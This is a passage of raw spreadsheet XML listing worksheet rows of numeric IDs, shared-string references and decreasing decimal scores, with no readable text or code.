      <c r="B27948" s="2">
        <v>3.0384265E7</v>
      </c>
      <c r="C27948" s="2" t="s">
        <v>26855</v>
      </c>
      <c r="D27948" s="2">
        <v>1.0</v>
      </c>
      <c r="E27948" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27948" s="2">
        <v>0.1355555555555556</v>
      </c>
    </row>
    <row r="27949" ht="15.75" customHeight="1">
      <c r="A27949" s="1">
        <v>27976.0</v>
      </c>
      <c r="B27949" s="2">
        <v>2.4001726E7</v>
      </c>
      <c r="C27949" s="2" t="s">
        <v>26856</v>
      </c>
      <c r="D27949" s="2">
        <v>1.0</v>
      </c>
      <c r="E27949" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27949" s="2">
        <v>0.1355218855218856</v>
      </c>
    </row>
    <row r="27950" ht="15.75" customHeight="1">
      <c r="A27950" s="1">
        <v>10784.0</v>
      </c>
      <c r="B27950" s="2">
        <v>1.5664918E7</v>
      </c>
      <c r="C27950" s="2" t="s">
        <v>26857</v>
      </c>
      <c r="D27950" s="2">
        <v>1.0</v>
      </c>
      <c r="E27950" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27950" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="27951" ht="15.75" customHeight="1">
      <c r="A27951" s="1">
        <v>11076.0</v>
      </c>
      <c r="B27951" s="2">
        <v>1.8410687E7</v>
      </c>
      <c r="C27951" s="2" t="s">
        <v>26858</v>
      </c>
      <c r="D27951" s="2">
        <v>1.0</v>
      </c>
      <c r="E27951" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27951" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="27952" ht="15.75" customHeight="1">
      <c r="A27952" s="1">
        <v>14442.0</v>
      </c>
      <c r="B27952" s="2">
        <v>3.933945E7</v>
      </c>
      <c r="C27952" s="2" t="s">
        <v>26859</v>
      </c>
      <c r="D27952" s="2">
        <v>1.0</v>
      </c>
      <c r="E27952" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27952" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="27953" ht="15.75" customHeight="1">
      <c r="A27953" s="1">
        <v>14511.0</v>
      </c>
      <c r="B27953" s="2">
        <v>3.9724982E7</v>
      </c>
      <c r="C27953" s="2" t="s">
        <v>26860</v>
      </c>
      <c r="D27953" s="2">
        <v>1.0</v>
      </c>
      <c r="E27953" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27953" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="27954" ht="15.75" customHeight="1">
      <c r="A27954" s="1">
        <v>19567.0</v>
      </c>
      <c r="B27954" s="2">
        <v>5.6132724E7</v>
      </c>
      <c r="C27954" s="2" t="s">
        <v>26861</v>
      </c>
      <c r="D27954" s="2">
        <v>1.0</v>
      </c>
      <c r="E27954" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27954" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="27955" ht="15.75" customHeight="1">
      <c r="A27955" s="1">
        <v>29762.0</v>
      </c>
      <c r="B27955" s="2">
        <v>3.4815502E7</v>
      </c>
      <c r="C27955" s="2" t="s">
        <v>26862</v>
      </c>
      <c r="D27955" s="2">
        <v>1.0</v>
      </c>
      <c r="E27955" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27955" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="27956" ht="15.75" customHeight="1">
      <c r="A27956" s="1">
        <v>31671.0</v>
      </c>
      <c r="B27956" s="2">
        <v>5182813.0</v>
      </c>
      <c r="C27956" s="2" t="s">
        <v>26863</v>
      </c>
      <c r="D27956" s="2">
        <v>1.0</v>
      </c>
      <c r="E27956" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27956" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="27957" ht="15.75" customHeight="1">
      <c r="A27957" s="1">
        <v>3198.0</v>
      </c>
      <c r="B27957" s="2">
        <v>3.7232109E7</v>
      </c>
      <c r="C27957" s="2" t="s">
        <v>26864</v>
      </c>
      <c r="D27957" s="2">
        <v>1.0</v>
      </c>
      <c r="E27957" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27957" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="27958" ht="15.75" customHeight="1">
      <c r="A27958" s="1">
        <v>10548.0</v>
      </c>
      <c r="B27958" s="2">
        <v>1.2597376E7</v>
      </c>
      <c r="C27958" s="2" t="s">
        <v>26865</v>
      </c>
      <c r="D27958" s="2">
        <v>1.0</v>
      </c>
      <c r="E27958" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27958" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="27959" ht="15.75" customHeight="1">
      <c r="A27959" s="1">
        <v>25693.0</v>
      </c>
      <c r="B27959" s="2">
        <v>1.4528518E7</v>
      </c>
      <c r="C27959" s="2" t="s">
        <v>26866</v>
      </c>
      <c r="D27959" s="2">
        <v>1.0</v>
      </c>
      <c r="E27959" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27959" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="27960" ht="15.75" customHeight="1">
      <c r="A27960" s="1">
        <v>12177.0</v>
      </c>
      <c r="B27960" s="2">
        <v>2.7456247E7</v>
      </c>
      <c r="C27960" s="2" t="s">
        <v>26867</v>
      </c>
      <c r="D27960" s="2">
        <v>1.0</v>
      </c>
      <c r="E27960" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27960" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="27961" ht="15.75" customHeight="1">
      <c r="A27961" s="1">
        <v>15109.0</v>
      </c>
      <c r="B27961" s="2">
        <v>4.1837569E7</v>
      </c>
      <c r="C27961" s="2" t="s">
        <v>26868</v>
      </c>
      <c r="D27961" s="2">
        <v>1.0</v>
      </c>
      <c r="E27961" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27961" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="27962" ht="15.75" customHeight="1">
      <c r="A27962" s="1">
        <v>20391.0</v>
      </c>
      <c r="B27962" s="2">
        <v>1.2046758E7</v>
      </c>
      <c r="C27962" s="2" t="s">
        <v>26869</v>
      </c>
      <c r="D27962" s="2">
        <v>1.0</v>
      </c>
      <c r="E27962" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27962" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="27963" ht="15.75" customHeight="1">
      <c r="A27963" s="1">
        <v>24790.0</v>
      </c>
      <c r="B27963" s="2">
        <v>1.1982888E7</v>
      </c>
      <c r="C27963" s="2" t="s">
        <v>26870</v>
      </c>
      <c r="D27963" s="2">
        <v>1.0</v>
      </c>
      <c r="E27963" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27963" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="27964" ht="15.75" customHeight="1">
      <c r="A27964" s="1">
        <v>24811.0</v>
      </c>
      <c r="B27964" s="2">
        <v>1.2046757E7</v>
      </c>
      <c r="C27964" s="2" t="s">
        <v>26871</v>
      </c>
      <c r="D27964" s="2">
        <v>1.0</v>
      </c>
      <c r="E27964" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27964" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="27965" ht="15.75" customHeight="1">
      <c r="A27965" s="1">
        <v>28791.0</v>
      </c>
      <c r="B27965" s="2">
        <v>2.8532084E7</v>
      </c>
      <c r="C27965" s="2" t="s">
        <v>26872</v>
      </c>
      <c r="D27965" s="2">
        <v>1.0</v>
      </c>
      <c r="E27965" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27965" s="2">
        <v>0.1345486111111112</v>
      </c>
    </row>
    <row r="27966" ht="15.75" customHeight="1">
      <c r="A27966" s="1">
        <v>16891.0</v>
      </c>
      <c r="B27966" s="2">
        <v>4.8039206E7</v>
      </c>
      <c r="C27966" s="2" t="s">
        <v>26873</v>
      </c>
      <c r="D27966" s="2">
        <v>1.0</v>
      </c>
      <c r="E27966" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27966" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="27967" ht="15.75" customHeight="1">
      <c r="A27967" s="1">
        <v>30273.0</v>
      </c>
      <c r="B27967" s="2">
        <v>3.7690143E7</v>
      </c>
      <c r="C27967" s="2" t="s">
        <v>26874</v>
      </c>
      <c r="D27967" s="2">
        <v>1.0</v>
      </c>
      <c r="E27967" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27967" s="2">
        <v>0.1343434343434343</v>
      </c>
    </row>
    <row r="27968" ht="15.75" customHeight="1">
      <c r="A27968" s="1">
        <v>148.0</v>
      </c>
      <c r="B27968" s="2">
        <v>1.3592493E7</v>
      </c>
      <c r="C27968" s="2" t="s">
        <v>26875</v>
      </c>
      <c r="D27968" s="2">
        <v>1.0</v>
      </c>
      <c r="E27968" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27968" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="27969" ht="15.75" customHeight="1">
      <c r="A27969" s="1">
        <v>3665.0</v>
      </c>
      <c r="B27969" s="2">
        <v>3.9372764E7</v>
      </c>
      <c r="C27969" s="2" t="s">
        <v>26876</v>
      </c>
      <c r="D27969" s="2">
        <v>1.0</v>
      </c>
      <c r="E27969" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27969" s="2">
        <v>0.1341269841269842</v>
      </c>
    </row>
    <row r="27970" ht="15.75" customHeight="1">
      <c r="A27970" s="1">
        <v>28189.0</v>
      </c>
      <c r="B27970" s="2">
        <v>2.5006825E7</v>
      </c>
      <c r="C27970" s="2" t="s">
        <v>26877</v>
      </c>
      <c r="D27970" s="2">
        <v>1.0</v>
      </c>
      <c r="E27970" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27970" s="2">
        <v>0.1340740740740741</v>
      </c>
    </row>
    <row r="27971" ht="15.75" customHeight="1">
      <c r="A27971" s="1">
        <v>204.0</v>
      </c>
      <c r="B27971" s="2">
        <v>1.4510941E7</v>
      </c>
      <c r="C27971" s="2" t="s">
        <v>26878</v>
      </c>
      <c r="D27971" s="2">
        <v>1.0</v>
      </c>
      <c r="E27971" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27971" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="27972" ht="15.75" customHeight="1">
      <c r="A27972" s="1">
        <v>10197.0</v>
      </c>
      <c r="B27972" s="2">
        <v>5.7399401E7</v>
      </c>
      <c r="C27972" s="2" t="s">
        <v>26879</v>
      </c>
      <c r="D27972" s="2">
        <v>1.0</v>
      </c>
      <c r="E27972" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27972" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="27973" ht="15.75" customHeight="1">
      <c r="A27973" s="1">
        <v>16687.0</v>
      </c>
      <c r="B27973" s="2">
        <v>4.7320473E7</v>
      </c>
      <c r="C27973" s="2" t="s">
        <v>26880</v>
      </c>
      <c r="D27973" s="2">
        <v>1.0</v>
      </c>
      <c r="E27973" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27973" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="27974" ht="15.75" customHeight="1">
      <c r="A27974" s="1">
        <v>25223.0</v>
      </c>
      <c r="B27974" s="2">
        <v>1.3309378E7</v>
      </c>
      <c r="C27974" s="2" t="s">
        <v>26881</v>
      </c>
      <c r="D27974" s="2">
        <v>1.0</v>
      </c>
      <c r="E27974" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27974" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="27975" ht="15.75" customHeight="1">
      <c r="A27975" s="1">
        <v>28124.0</v>
      </c>
      <c r="B27975" s="2">
        <v>2.4719185E7</v>
      </c>
      <c r="C27975" s="2" t="s">
        <v>26882</v>
      </c>
      <c r="D27975" s="2">
        <v>1.0</v>
      </c>
      <c r="E27975" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27975" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="27976" ht="15.75" customHeight="1">
      <c r="A27976" s="1">
        <v>5137.0</v>
      </c>
      <c r="B27976" s="2">
        <v>4.4639014E7</v>
      </c>
      <c r="C27976" s="2" t="s">
        <v>26883</v>
      </c>
      <c r="D27976" s="2">
        <v>1.0</v>
      </c>
      <c r="E27976" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27976" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="27977" ht="15.75" customHeight="1">
      <c r="A27977" s="1">
        <v>11454.0</v>
      </c>
      <c r="B27977" s="2">
        <v>2.1809962E7</v>
      </c>
      <c r="C27977" s="2" t="s">
        <v>26884</v>
      </c>
      <c r="D27977" s="2">
        <v>1.0</v>
      </c>
      <c r="E27977" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27977" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="27978" ht="15.75" customHeight="1">
      <c r="A27978" s="1">
        <v>16973.0</v>
      </c>
      <c r="B27978" s="2">
        <v>4.8297569E7</v>
      </c>
      <c r="C27978" s="2" t="s">
        <v>26885</v>
      </c>
      <c r="D27978" s="2">
        <v>1.0</v>
      </c>
      <c r="E27978" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27978" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="27979" ht="15.75" customHeight="1">
      <c r="A27979" s="1">
        <v>17380.0</v>
      </c>
      <c r="B27979" s="2">
        <v>4.9530789E7</v>
      </c>
      <c r="C27979" s="2" t="s">
        <v>26886</v>
      </c>
      <c r="D27979" s="2">
        <v>1.0</v>
      </c>
      <c r="E27979" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27979" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="27980" ht="15.75" customHeight="1">
      <c r="A27980" s="1">
        <v>26681.0</v>
      </c>
      <c r="B27980" s="2">
        <v>1.8100506E7</v>
      </c>
      <c r="C27980" s="2" t="s">
        <v>26887</v>
      </c>
      <c r="D27980" s="2">
        <v>1.0</v>
      </c>
      <c r="E27980" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27980" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="27981" ht="15.75" customHeight="1">
      <c r="A27981" s="1">
        <v>33292.0</v>
      </c>
      <c r="B27981" s="2">
        <v>7481580.0</v>
      </c>
      <c r="C27981" s="2" t="s">
        <v>26888</v>
      </c>
      <c r="D27981" s="2">
        <v>1.0</v>
      </c>
      <c r="E27981" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27981" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="27982" ht="15.75" customHeight="1">
      <c r="A27982" s="1">
        <v>23754.0</v>
      </c>
      <c r="B27982" s="2">
        <v>7472255.0</v>
      </c>
      <c r="C27982" s="2" t="s">
        <v>26889</v>
      </c>
      <c r="D27982" s="2">
        <v>1.0</v>
      </c>
      <c r="E27982" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27982" s="2">
        <v>0.1331699346405229</v>
      </c>
    </row>
    <row r="27983" ht="15.75" customHeight="1">
      <c r="A27983" s="1">
        <v>26548.0</v>
      </c>
      <c r="B27983" s="2">
        <v>1.775884E7</v>
      </c>
      <c r="C27983" s="2" t="s">
        <v>26890</v>
      </c>
      <c r="D27983" s="2">
        <v>1.0</v>
      </c>
      <c r="E27983" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27983" s="2">
        <v>0.1331569664902999</v>
      </c>
    </row>
    <row r="27984" ht="15.75" customHeight="1">
      <c r="A27984" s="1">
        <v>27872.0</v>
      </c>
      <c r="B27984" s="2">
        <v>2.3538154E7</v>
      </c>
      <c r="C27984" s="2" t="s">
        <v>26891</v>
      </c>
      <c r="D27984" s="2">
        <v>1.0</v>
      </c>
      <c r="E27984" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27984" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="27985" ht="15.75" customHeight="1">
      <c r="A27985" s="1">
        <v>6048.0</v>
      </c>
      <c r="B27985" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C27985" s="2" t="s">
        <v>26892</v>
      </c>
      <c r="D27985" s="2">
        <v>1.0</v>
      </c>
      <c r="E27985" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27985" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="27986" ht="15.75" customHeight="1">
      <c r="A27986" s="1">
        <v>32851.0</v>
      </c>
      <c r="B27986" s="2">
        <v>6253926.0</v>
      </c>
      <c r="C27986" s="2" t="s">
        <v>26893</v>
      </c>
      <c r="D27986" s="2">
        <v>1.0</v>
      </c>
      <c r="E27986" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27986" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="27987" ht="15.75" customHeight="1">
      <c r="A27987" s="1">
        <v>32060.0</v>
      </c>
      <c r="B27987" s="2">
        <v>5378876.0</v>
      </c>
      <c r="C27987" s="2" t="s">
        <v>26894</v>
      </c>
      <c r="D27987" s="2">
        <v>1.0</v>
      </c>
      <c r="E27987" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27987" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="27988" ht="15.75" customHeight="1">
      <c r="A27988" s="1">
        <v>10908.0</v>
      </c>
      <c r="B27988" s="2">
        <v>1.6675889E7</v>
      </c>
      <c r="C27988" s="2" t="s">
        <v>26895</v>
      </c>
      <c r="D27988" s="2">
        <v>1.0</v>
      </c>
      <c r="E27988" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27988" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="27989" ht="15.75" customHeight="1">
      <c r="A27989" s="1">
        <v>14074.0</v>
      </c>
      <c r="B27989" s="2">
        <v>3.7658769E7</v>
      </c>
      <c r="C27989" s="2" t="s">
        <v>26896</v>
      </c>
      <c r="D27989" s="2">
        <v>1.0</v>
      </c>
      <c r="E27989" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27989" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="27990" ht="15.75" customHeight="1">
      <c r="A27990" s="1">
        <v>17255.0</v>
      </c>
      <c r="B27990" s="2">
        <v>4.9127434E7</v>
      </c>
      <c r="C27990" s="2" t="s">
        <v>26897</v>
      </c>
      <c r="D27990" s="2">
        <v>1.0</v>
      </c>
      <c r="E27990" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27990" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="27991" ht="15.75" customHeight="1">
      <c r="A27991" s="1">
        <v>33438.0</v>
      </c>
      <c r="B27991" s="2">
        <v>7836198.0</v>
      </c>
      <c r="C27991" s="2" t="s">
        <v>26898</v>
      </c>
      <c r="D27991" s="2">
        <v>1.0</v>
      </c>
      <c r="E27991" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27991" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="27992" ht="15.75" customHeight="1">
      <c r="A27992" s="1">
        <v>9694.0</v>
      </c>
      <c r="B27992" s="2">
        <v>5.6352584E7</v>
      </c>
      <c r="C27992" s="2" t="s">
        <v>26899</v>
      </c>
      <c r="D27992" s="2">
        <v>1.0</v>
      </c>
      <c r="E27992" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27992" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27993" ht="15.75" customHeight="1">
      <c r="A27993" s="1">
        <v>11063.0</v>
      </c>
      <c r="B27993" s="2">
        <v>1.8253598E7</v>
      </c>
      <c r="C27993" s="2" t="s">
        <v>26900</v>
      </c>
      <c r="D27993" s="2">
        <v>1.0</v>
      </c>
      <c r="E27993" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27993" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27994" ht="15.75" customHeight="1">
      <c r="A27994" s="1">
        <v>11777.0</v>
      </c>
      <c r="B27994" s="2">
        <v>2.4280474E7</v>
      </c>
      <c r="C27994" s="2" t="s">
        <v>26901</v>
      </c>
      <c r="D27994" s="2">
        <v>1.0</v>
      </c>
      <c r="E27994" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27994" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27995" ht="15.75" customHeight="1">
      <c r="A27995" s="1">
        <v>15538.0</v>
      </c>
      <c r="B27995" s="2">
        <v>4.3344024E7</v>
      </c>
      <c r="C27995" s="2" t="s">
        <v>26902</v>
      </c>
      <c r="D27995" s="2">
        <v>1.0</v>
      </c>
      <c r="E27995" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27995" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27996" ht="15.75" customHeight="1">
      <c r="A27996" s="1">
        <v>20301.0</v>
      </c>
      <c r="B27996" s="2">
        <v>1.1316654E7</v>
      </c>
      <c r="C27996" s="2" t="s">
        <v>26903</v>
      </c>
      <c r="D27996" s="2">
        <v>1.0</v>
      </c>
      <c r="E27996" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27996" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27997" ht="15.75" customHeight="1">
      <c r="A27997" s="1">
        <v>23347.0</v>
      </c>
      <c r="B27997" s="2">
        <v>5.47977E7</v>
      </c>
      <c r="C27997" s="2" t="s">
        <v>26904</v>
      </c>
      <c r="D27997" s="2">
        <v>1.0</v>
      </c>
      <c r="E27997" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27997" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27998" ht="15.75" customHeight="1">
      <c r="A27998" s="1">
        <v>23403.0</v>
      </c>
      <c r="B27998" s="2">
        <v>5591841.0</v>
      </c>
      <c r="C27998" s="2" t="s">
        <v>26905</v>
      </c>
      <c r="D27998" s="2">
        <v>1.0</v>
      </c>
      <c r="E27998" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27998" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="27999" ht="15.75" customHeight="1">
      <c r="A27999" s="1">
        <v>25210.0</v>
      </c>
      <c r="B27999" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C27999" s="2" t="s">
        <v>26906</v>
      </c>
      <c r="D27999" s="2">
        <v>1.0</v>
      </c>
      <c r="E27999" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27999" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28000" ht="15.75" customHeight="1">
      <c r="A28000" s="1">
        <v>26785.0</v>
      </c>
      <c r="B28000" s="2">
        <v>1.855902E7</v>
      </c>
      <c r="C28000" s="2" t="s">
        <v>26907</v>
      </c>
      <c r="D28000" s="2">
        <v>1.0</v>
      </c>
      <c r="E28000" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28000" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28001" ht="15.75" customHeight="1">
      <c r="A28001" s="1">
        <v>27478.0</v>
      </c>
      <c r="B28001" s="2">
        <v>2.2019427E7</v>
      </c>
      <c r="C28001" s="2" t="s">
        <v>26908</v>
      </c>
      <c r="D28001" s="2">
        <v>1.0</v>
      </c>
      <c r="E28001" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28001" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28002" ht="15.75" customHeight="1">
      <c r="A28002" s="1">
        <v>31938.0</v>
      </c>
      <c r="B28002" s="2">
        <v>5.3074114E7</v>
      </c>
      <c r="C28002" s="2" t="s">
        <v>26909</v>
      </c>
      <c r="D28002" s="2">
        <v>1.0</v>
      </c>
      <c r="E28002" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28002" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28003" ht="15.75" customHeight="1">
      <c r="A28003" s="1">
        <v>32153.0</v>
      </c>
      <c r="B28003" s="2">
        <v>5.4289943E7</v>
      </c>
      <c r="C28003" s="2" t="s">
        <v>26910</v>
      </c>
      <c r="D28003" s="2">
        <v>1.0</v>
      </c>
      <c r="E28003" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28003" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28004" ht="15.75" customHeight="1">
      <c r="A28004" s="1">
        <v>32345.0</v>
      </c>
      <c r="B28004" s="2">
        <v>5591840.0</v>
      </c>
      <c r="C28004" s="2" t="s">
        <v>26905</v>
      </c>
      <c r="D28004" s="2">
        <v>1.0</v>
      </c>
      <c r="E28004" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28004" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="28005" ht="15.75" customHeight="1">
      <c r="A28005" s="1">
        <v>25430.0</v>
      </c>
      <c r="B28005" s="2">
        <v>1.3835621E7</v>
      </c>
      <c r="C28005" s="2" t="s">
        <v>26911</v>
      </c>
      <c r="D28005" s="2">
        <v>1.0</v>
      </c>
      <c r="E28005" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28005" s="2">
        <v>0.1325925925925927</v>
      </c>
    </row>
    <row r="28006" ht="15.75" customHeight="1">
      <c r="A28006" s="1">
        <v>4864.0</v>
      </c>
      <c r="B28006" s="2">
        <v>4.3815093E7</v>
      </c>
      <c r="C28006" s="2" t="s">
        <v>26912</v>
      </c>
      <c r="D28006" s="2">
        <v>1.0</v>
      </c>
      <c r="E28006" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28006" s="2">
        <v>0.1325396825396826</v>
      </c>
    </row>
    <row r="28007" ht="15.75" customHeight="1">
      <c r="A28007" s="1">
        <v>2048.0</v>
      </c>
      <c r="B28007" s="2">
        <v>3.0935569E7</v>
      </c>
      <c r="C28007" s="2" t="s">
        <v>26913</v>
      </c>
      <c r="D28007" s="2">
        <v>1.0</v>
      </c>
      <c r="E28007" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28007" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="28008" ht="15.75" customHeight="1">
      <c r="A28008" s="1">
        <v>27530.0</v>
      </c>
      <c r="B28008" s="2">
        <v>2.2199264E7</v>
      </c>
      <c r="C28008" s="2" t="s">
        <v>26914</v>
      </c>
      <c r="D28008" s="2">
        <v>1.0</v>
      </c>
      <c r="E28008" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28008" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="28009" ht="15.75" customHeight="1">
      <c r="A28009" s="1">
        <v>14813.0</v>
      </c>
      <c r="B28009" s="2">
        <v>4.0931509E7</v>
      </c>
      <c r="C28009" s="2" t="s">
        <v>26915</v>
      </c>
      <c r="D28009" s="2">
        <v>1.0</v>
      </c>
      <c r="E28009" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28009" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="28010" ht="15.75" customHeight="1">
      <c r="A28010" s="1">
        <v>16518.0</v>
      </c>
      <c r="B28010" s="2">
        <v>4.6642861E7</v>
      </c>
      <c r="C28010" s="2" t="s">
        <v>26916</v>
      </c>
      <c r="D28010" s="2">
        <v>1.0</v>
      </c>
      <c r="E28010" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28010" s="2">
        <v>0.1322378716744914</v>
      </c>
    </row>
    <row r="28011" ht="15.75" customHeight="1">
      <c r="A28011" s="1">
        <v>11171.0</v>
      </c>
      <c r="B28011" s="2">
        <v>1.966341E7</v>
      </c>
      <c r="C28011" s="2" t="s">
        <v>26917</v>
      </c>
      <c r="D28011" s="2">
        <v>1.0</v>
      </c>
      <c r="E28011" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28011" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="28012" ht="15.75" customHeight="1">
      <c r="A28012" s="1">
        <v>24711.0</v>
      </c>
      <c r="B28012" s="2">
        <v>1.1679611E7</v>
      </c>
      <c r="C28012" s="2" t="s">
        <v>26918</v>
      </c>
      <c r="D28012" s="2">
        <v>1.0</v>
      </c>
      <c r="E28012" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28012" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="28013" ht="15.75" customHeight="1">
      <c r="A28013" s="1">
        <v>14953.0</v>
      </c>
      <c r="B28013" s="2">
        <v>4.1318615E7</v>
      </c>
      <c r="C28013" s="2" t="s">
        <v>26919</v>
      </c>
      <c r="D28013" s="2">
        <v>1.0</v>
      </c>
      <c r="E28013" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28013" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="28014" ht="15.75" customHeight="1">
      <c r="A28014" s="1">
        <v>18363.0</v>
      </c>
      <c r="B28014" s="2">
        <v>5.2551692E7</v>
      </c>
      <c r="C28014" s="2" t="s">
        <v>26920</v>
      </c>
      <c r="D28014" s="2">
        <v>1.0</v>
      </c>
      <c r="E28014" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28014" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="28015" ht="15.75" customHeight="1">
      <c r="A28015" s="1">
        <v>26489.0</v>
      </c>
      <c r="B28015" s="2">
